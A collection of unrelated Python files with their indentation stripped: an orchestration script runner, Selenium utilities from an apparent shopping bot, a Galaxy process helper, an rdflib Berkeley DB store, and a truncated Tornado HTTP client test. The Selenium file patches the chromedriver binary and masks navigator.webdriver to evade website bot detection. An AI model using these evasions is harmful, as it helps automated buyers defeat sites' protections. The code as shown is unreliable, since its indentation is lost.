return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None, raiseException=True):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
if raiseException:
ctx.logger.debug("Script {0} will raise an exception".format(command))
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
def executePy(script_path, tosca_env_map):
tosca_params={'tosca': {'inputs': tosca_env_map, 'outputs': {}}}
execfile(script_path, globals().copy(), tosca_params)
return tosca_params['tosca'];
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
raiseExceptionOnFailure = True
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Apache/tosca.interfaces.node.lifecycle.Standard/start/start_apache.sh'), new_script_process, operationOutputNames, raiseException=raiseExceptionOnFailure)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['apache_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' + r'/'
ctx.instance.update()
|
selenium_utils.py
|
from chromedriver_py import binary_path as driver_path
from selenium.webdriver import DesiredCapabilities
from selenium.webdriver import Chrome, ChromeOptions # TODO: Combine these two dependencies. Leaving it for now since it touches too many sites atm.
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.wait import WebDriverWait
from utils import create_msg
import random, re, requests, string, threading, settings
# https://github.com/Hari-Nagarajan/nvidia-bot/blob/master/utils/selenium_utils.py
options = Options()
options.add_experimental_option(
"excludeSwitches", ["enable-automation", "enable-logging"],
)
options.add_experimental_option("useAutomationExtension", False)
class AnyEc:
"""Use with WebDriverWait to combine expected_conditions
in an OR.
"""
def __init__(self, *args):
self.ecs = args
def __call__(self, driver):
for fn in self.ecs:
try:
if fn(driver):
return True
except:
pass
def no_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 2}
options.add_experimental_option("prefs", prefs)
def yes_amazon_image():
prefs = {"profile.managed_default_content_settings.images": 0}
options.add_experimental_option("prefs", prefs)
def wait_for_element(d, e_id, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(ec.presence_of_element_located((By.ID, e_id)))
def wait_for_element_by_xpath(d, e_path, time=30):
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.XPATH, e_path))
)
def wait_for_element_by_class(d, e_class, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
return WebDriverWait(d, time).until(
ec.presence_of_element_located((By.CLASS_NAME, e_class))
)
def wait_for_title(d, title, path):
"""
Uses webdriver(d) to navigate to get(path) until it equals title(title)
"""
while d.title != title:
d.get(path)
WebDriverWait(d, 1000)
def wait_for_page(d, title, time=30):
"""
Uses webdriver(d) to wait for page title(title) to become visible
"""
WebDriverWait(d, time).until(ec.title_is(title))
def wait_for_either_title(d, title1, title2, time=30):
"""
Uses webdriver(d) to wait for page title(title1 or title2) to become visible
"""
try:
WebDriverWait(d, time).until(AnyEc(ec.title_is(title1), ec.title_is(title2)))
except Exception:
pass
def wait_for_any_title(d, titles, time=30):
"""
Uses webdriver(d) to wait for page title(any in the list of titles) to become visible
"""
WebDriverWait(d, time).until(AnyEc(*[ec.title_is(title) for title in titles]))
def button_click_using_xpath(d, xpath):
"""
Uses webdriver(d) to click a button using an XPath(xpath)
"""
button_menu = WebDriverWait(d, 10).until(
ec.element_to_be_clickable((By.XPATH, xpath))
)
action = ActionChains(d)
action.move_to_element(button_menu).pause(1).click().perform()
def field_send_keys(d, field, keys):
"""
Uses webdriver(d) to fiend a field(field), clears it and sends keys(keys)
"""
elem = d.find_element_by_name(field)
elem.clear()
elem.send_keys(keys)
def has_class(element, class_name):
classes = element.get_attribute("class")
return class_name in classes
def add_cookies_to_session_from_driver(driver, session):
cookies = driver.get_cookies()
[
session.cookies.set_cookie(
requests.cookies.create_cookie(
domain=cookie["domain"],
name=cookie["name"],
value=cookie["value"],
)
)
for cookie in cookies
]
def enable_headless():
options.add_argument("--headless")
options.add_argument("--no-sandbox")
options.add_argument("--disable-dev-shm-usage")
return options
# https://stackoverflow.com/questions/33225947/can-a-website-detect-when-you-are-using-selenium-with-chromedriver
def change_driver(status_signal, loc):
fin = open(loc, 'rb')
data = fin.read()
val = "$" + "".join(random.choices(string.ascii_lowercase, k=3)) + "_" + \
"".join(random.choices(string.ascii_letters + string.digits, k=22)) + "_"
result = re.search(b"[$][a-z]{3}_[a-zA-Z0-9]{22}_", data)
if result is not None:
try:
status_signal.emit(create_msg("Changing value in Chromedriver", "normal"))
data = data.replace(result.group(0), val.encode())
fin.close()
fin = open(loc, 'wb')
fin.truncate()
fin.write(data)
fin.close()
except:
status_signal.emit(create_msg("Error modifying chromedriver", "error"))
else:
fin.close()
def open_browser(link, cookies):
threading.Thread(target=start_browser, args=(link, cookies)).start()
def start_browser(link, cookies):
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "eager"
chrome_options = ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", ["enable-automation"])
chrome_options.add_experimental_option("useAutomationExtension", False)
driver = Chrome(desired_capabilities=caps, executable_path=driver_path, options=chrome_options)
driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument",
{
"source": """
Object.defineProperty(window, 'navigator', {
value: new Proxy(navigator, {
has: (target, key) => (key === 'webdriver' ? false : key in target),
get: (target, key) =>
key === 'webdriver'
? undefined
: typeof target[key] === 'function'
? target[key].bind(target)
: target[key]
})
})
"""
},
)
driver.get(link)
for cookie in cookies:
driver.add_cookie({
"name": cookie["name"],
"value": cookie["value"],
"domain": cookie["domain"]
})
driver.get(link)
|
lazy_process.py
|
import subprocess
import threading
import time
class LazyProcess(object):
""" Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__(self, command_and_args):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process(self):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen(self.command_and_args, close_fds=True)
def shutdown(self):
with self.thread_lock:
self.allow_process_request = False
if self.running:
self.process.terminate()
time.sleep(.01)
if self.running:
self.process.kill()
@property
def running(self):
return self.process and not self.process.poll()
class NoOpLazyProcess(object):
""" LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process(self):
return
def shutdown(self):
return
@property
def running(self):
return False
|
sleepycat.py
|
from rdflib.store import Store, VALID_STORE, NO_STORE
from rdflib.term import URIRef
from six import b
from six.moves.urllib.request import pathname2url
def bb(u):
return u.encode('utf-8')
try:
from bsddb import db
has_bsddb = True
except ImportError:
try:
from bsddb3 import db
has_bsddb = True
except ImportError:
has_bsddb = False
from os import mkdir
from os.path import exists, abspath
from threading import Thread
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
import logging
logger = logging.getLogger(__name__)
__all__ = ['Sleepycat']
class Sleepycat(Store):
context_aware = True
formula_aware = True
transaction_aware = False
graph_aware = True
db_env = None
def __init__(self, configuration=None, identifier=None):
if not has_bsddb:
raise ImportError(
"Unable to import bsddb/bsddb3, store is unusable.")
self.__open = False
self.__identifier = identifier
super(Sleepycat, self).__init__(configuration)
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
if not exists(homeDir):
if create is True:
mkdir(homeDir)
# TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, CACHESIZE) # TODO
# db_env.set_lg_max(1024*1024)
db_env.set_flags(ENVSETFLAGS, 1)
db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
if not has_bsddb:
return NO_STORE
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions
# are enabled
dbopenflags = DBOPENFLAGS
if self.transaction_aware is True:
dbopenflags |= db.DB_AUTO_COMMIT
if create:
dbopenflags |= db.DB_CREATE
dbmode = 0o660
dbsetflags = 0
# create and open the DBs
self.__indicies = [None, ] * 3
self.__indicies_info = [None, ] * 3
for i in range(0, 3):
index_name = to_key_func(
i)((b("s"), b("p"), b("o")), b("c")).decode()
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in range(0, 8):
results = []
for start in range(0, 3):
score = 1
len = 0
for j in range(start, start + 3):
if i & (1 << (j % 3)):
score = score << 1
len += 1
else:
break
tie_break = 2 - start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i < end:
yield triple[i % 3]
i += 1
yield ""
return get_prefix
lookup[i] = (
self.__indicies[start],
get_prefix_func(start, start + len),
from_key_func(start),
results_from_key_func(start, self._from_string))
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.setDaemon(True)
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time() - t1 > min_seconds \
or time() - t0 > max_seconds:
self.__needs_sync = False
logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception as e:
logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, triple, context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
(subject, predicate, object) = triple
assert self.__open, "The Store must be open."
assert context != self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is None:
self.__contexts.put(bb(c), "", txn=txn)
contexts_value = cspo.get(
bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.add(bb(c))
contexts_value = b("^").join(contexts)
assert contexts_value is not None
cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), "", txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), "", txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), "", txn=txn)
if not quoted:
cspo.put(bb(
"%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
cpos.put(bb(
"%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
cosp.put(bb(
"%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, spo, c, quoted=False, txn=None):
s, p, o = spo
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get(
b("^").join([b(""), s, p, o, b("")]), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.discard(c)
contexts_value = b("^").join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(_to_key((s, p, o), b("")), contexts_value, txn=txn)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), b("")), txn=txn)
except db.DBNotFoundError:
pass # TODO: is it okay to ignore these?
def remove(self, spo, context, txn=None):
subject, predicate, object = spo
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if subject is not None \
and predicate is not None \
and object is not None \
and context is not None:
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get(bb("%s^%s^%s^%s^" %
(c, s, p, o)), txn=txn)
if value is not None:
self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or b("")
# remove triple from all non quoted contexts
contexts = set(contexts_value.split(b("^")))
# and from the conjunctive index
contexts.add(b(""))
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on
# remove((None, None, None), c)
try:
self.__contexts.delete(
bb(_to_string(context, txn=txn)), txn=txn)
except db.DBNotFoundError:
pass
self.__needs_sync = needs_sync
def triples(self, spo, context=None, txn=None):
"""A generator over all the triples matching """
assert self.__open, "The Store must be open."
subject, predicate, object = spo
if context is not None:
if context == self:
context = None
# _from_string = self._from_string ## UNUSED
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Cheap hack so 2to3 doesn't convert to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(
key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = b("^")
else:
prefix = bb("%s^" % self._to_string(context))
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count += 1
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
if bound_prefix:
self.__namespace.delete(bound_prefix)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
ns = self.__namespace.get(prefix, None)
if ns is not None:
return URIRef(ns.decode('utf-8'))
return None
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
prefix = self.__prefix.get(namespace, None)
if prefix is not None:
return prefix.decode('utf-8')
return None
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix.decode('utf-8'), namespace.decode('utf-8')))
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get(bb(
"%s^%s^%s^%s^" % ("", s, p, o)))
if contexts:
for c in contexts.split(b("^")):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
def add_graph(self, graph):
self.__contexts.put(bb(self._to_string(graph)), "")
def remove_graph(self, graph):
self.remove((None, None, None), graph)
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
# weird behavoir from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i, txn=txn)
else:
i = i.decode()
return i
def __lookup(self, spo, context, txn=None):
subject, predicate, object = spo
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
# print (subject, predicate, object), context, prefix_func, index
# #DEBUG
prefix = bb(
"^".join(prefix_func((subject, predicate, object), context)))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return b("^").join(
(context,
triple[i % 3],
triple[(i + 1) % 3],
triple[(i + 2) % 3], b(""))) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split(b("^"))
return \
parts[0], \
parts[(3 - i + 0) % 3 + 1], \
parts[(3 - i + 1) % 3 + 1], \
parts[(3 - i + 2) % 3 + 1]
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split(b("^"))
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3 - i + 0) % 3 + 1])
else:
s = subject
if predicate is None: # i & 2:
p = from_string(parts[(3 - i + 1) % 3 + 1])
else:
p = predicate
if object is None: # i & 4:
o = from_string(parts[(3 - i + 2) % 3 + 1])
else:
o = object
return (s, p, o), (
from_string(c) for c in contexts_value.split(b("^")) if c)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1:
s = "s"
if i & 2:
p = "p"
if i & 4:
o = "o"
return "%s,%s,%s" % (s, p, o)
|
httpclient_test.py
|
# -*- coding: utf-8 -*-
import base64
import binascii
from contextlib import closing
import copy
import threading
import datetime
from io import BytesIO
import subprocess
import sys
import time
import typing # noqa: F401
import unicodedata
import unittest
from tornado.escape import utf8, native_str, to_unicode
from tornado import gen
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
_RequestProxy,
HTTPError,
HTTPClient,
)
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log, app_log
from tornado import netutil
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import skipOnTravis
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish(
"Post arg1: %s, arg2: %s"
% (self.get_argument("arg1"), self.get_argument("arg2"))
)
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write("redirects can have bodies too")
self.redirect(
self.get_argument("url"), status=int(self.get_argument("status", "302"))
)
class RedirectWithoutLocationHandler(RequestHandler):
def prepare(self):
# For testing error handling of a redirect with no location header.
self.set_status(301)
self.finish()
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get("User-Agent", "User agent not set"))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header("Content-Length", 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ("OTHER",) # type: ignore
def method(self):
self.write(self.request.method)
get = head = post = put = delete = options = patch = other = method # type: ignore
class SetHeaderHandler(RequestHandler):
def get(self):
# Use get_arguments for keys to get strings, but
# request.arguments for values to get bytes.
for k, v in zip(self.get_arguments("k"), self.request.arguments["v"]):
self.set_header(k, v)
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application(
[
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/redirect_without_location", RedirectWithoutLocationHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url("/patch", PatchHandler),
url("/set_header", SetHeaderHandler),
],
gzip=True,
)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method="PATCH", body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = [] # type: typing.List[bytes]
response = self.fetch("/hello", streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST", body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = [] # type: typing.List[bytes]
response = self.fetch("/chunk", streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_basic_auth(self):
# This test data appears in section 2 of RFC 7617.
self.assertEqual(
self.fetch(
"/auth", auth_username="Aladdin", auth_password="open sesame"
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_explicit_mode(self):
self.assertEqual(
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic",
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_unicode(self):
# This test data appears in section 2.1 of RFC 7617.
self.assertEqual(
self.fetch("/auth", auth_username="test", auth_password="123£").body,
b"Basic dGVzdDoxMjPCow==",
)
# The standard mandates NFC. Give it a decomposed username
# and ensure it is normalized to composed form.
username = unicodedata.normalize("NFD", u"josé")
self.assertEqual(
self.fetch("/auth", auth_username=username, auth_password="səcrət").body,
b"Basic am9zw6k6c8mZY3LJmXQ=",
)
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf",
raise_error=True,
)
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_redirect_without_location(self):
response = self.fetch("/redirect_without_location", follow_redirects=True)
# If there is no location header, the redirect response should
# just be returned as-is. (This should arguably raise an
# error, but libcurl doesn't treat this as an error, so we
# don't either).
self.assertEqual(301, response.code)
def test_redirect_put_with_body(self):
response = self.fetch(
"/redirect?url=/put&status=307", method="PUT", body="hello"
)
self.assertEqual(response.body, b"Put body: hello")
def test_redirect_put_without_body(self):
# This "without body" edge case is similar to what happens with body_producer.
response = self.fetch(
"/redirect?url=/put&status=307",
method="PUT",
allow_nonstandard_methods=True,
)
self.assertEqual(response.body, b"Put body: ")
def test_method_after_redirect(self):
